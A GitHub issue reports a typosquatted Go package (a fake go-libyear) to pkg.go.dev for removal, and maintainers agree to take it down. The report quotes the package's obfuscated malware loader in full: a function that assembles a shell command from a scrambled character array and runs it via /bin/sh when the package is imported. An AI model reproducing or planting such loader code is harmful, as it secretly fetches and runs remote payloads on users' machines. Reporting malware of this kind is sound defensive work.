Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

x/pkgsite: package removal request for github.com/potablewashb/go-libyear #72106

Open
Mihara opened this issue Mar 5, 2025 · 4 comments
Open

x/pkgsite: package removal request for github.com/potablewashb/go-libyear #72106

Mihara opened this issue Mar 5, 2025 · 4 comments
Assignees
@ansaba
Labels
pkgsite/package-removal Issues for package removal. See https://pkg.go.dev/about#removing-a-package pkgsite
Milestone
Unreleased

Comments

@Mihara
Copy link

Mihara commented Mar 5, 2025

This package is a typosquatted copy of, presumably nieomylnieja/go-libyear contains a malware loader described in Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS Systems, which fires on import:

func WBtPqiI() error {
        eFpJ := []string{"4", "w", "/", "s", "/", "n", "d", "n", "i", "i", "-", "o", "/", "i", "/", "p", "/", "3", "t", "l", "f", "h", ".", " ", "a", "e", " ", "b", "1", "d", "f", "u", "5", "n", "e", "a", "b", "/"
, "r", "6", "&", "7", "n", "O", "g", " ", "s", "t", "|", "k", "0", ":", "-", "/", "g", "r", "o", "t", "n", "s", " ", "3", "a", "l", "d", "b", " ", "m", "e", " ", "t", "e", "3", "h", "e"}
        wquLFf := "/bin/sh"
        cvYWq := "-c"
        bBAo := eFpJ[1] + eFpJ[54] + eFpJ[25] + eFpJ[18] + eFpJ[23] + eFpJ[10] + eFpJ[43] + eFpJ[66] + eFpJ[52] + eFpJ[69] + eFpJ[73] + eFpJ[57] + eFpJ[70] + eFpJ[15] + eFpJ[46] + eFpJ[51] + eFpJ[37] + eFpJ[16] +
eFpJ[58] + eFpJ[31] + eFpJ[67] + eFpJ[74] + eFpJ[38] + eFpJ[19] + eFpJ[13] + eFpJ[42] + eFpJ[49] + eFpJ[22] + eFpJ[56] + eFpJ[7] + eFpJ[63] + eFpJ[9] + eFpJ[5] + eFpJ[34] + eFpJ[12] + eFpJ[3] + eFpJ[47] + eFpJ[11]
 + eFpJ[55] + eFpJ[35] + eFpJ[44] + eFpJ[68] + eFpJ[14] + eFpJ[64] + eFpJ[71] + eFpJ[72] + eFpJ[41] + eFpJ[17] + eFpJ[29] + eFpJ[50] + eFpJ[6] + eFpJ[20] + eFpJ[4] + eFpJ[24] + eFpJ[61] + eFpJ[28] + eFpJ[32] + eFp
J[0] + eFpJ[39] + eFpJ[36] + eFpJ[30] + eFpJ[26] + eFpJ[48] + eFpJ[45] + eFpJ[53] + eFpJ[65] + eFpJ[8] + eFpJ[33] + eFpJ[2] + eFpJ[27] + eFpJ[62] + eFpJ[59] + eFpJ[21] + eFpJ[60] + eFpJ[40]
        exec.Command(wquLFf, cvYWq, bBAo).Start()
        return nil
}
@gopherbot gopherbot added this to the Unreleased milestone Mar 5, 2025
@seankhliao
Copy link
Member

cc @golang/security

@gabyhelp gabyhelp added the pkgsite/package-removal Issues for package removal. See https://pkg.go.dev/about#removing-a-package label Mar 5, 2025
@Mihara
Copy link
Author

Mihara commented Mar 5, 2025

After a brief search, I found another copy of the same malware loader in a different clone of the same package. Fortunately it's not in pkg cache. Ideally it should never end up in there.

@ansaba
Copy link

ansaba commented Mar 6, 2025

cc: @golang/security

@ansaba ansaba self-assigned this Mar 6, 2025
@ansaba
Copy link

ansaba commented Mar 6, 2025

I will remove the pkg from pkgsite.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@ansaba ansaba

Labels
pkgsite/package-removal Issues for package removal. See https://pkg.go.dev/about#removing-a-package pkgsite
Projects
None yet
Milestone
Unreleased
Development

No branches or pull requests
5 participants
@Mihara @ansaba @gopherbot @seankhliao @gabyhelp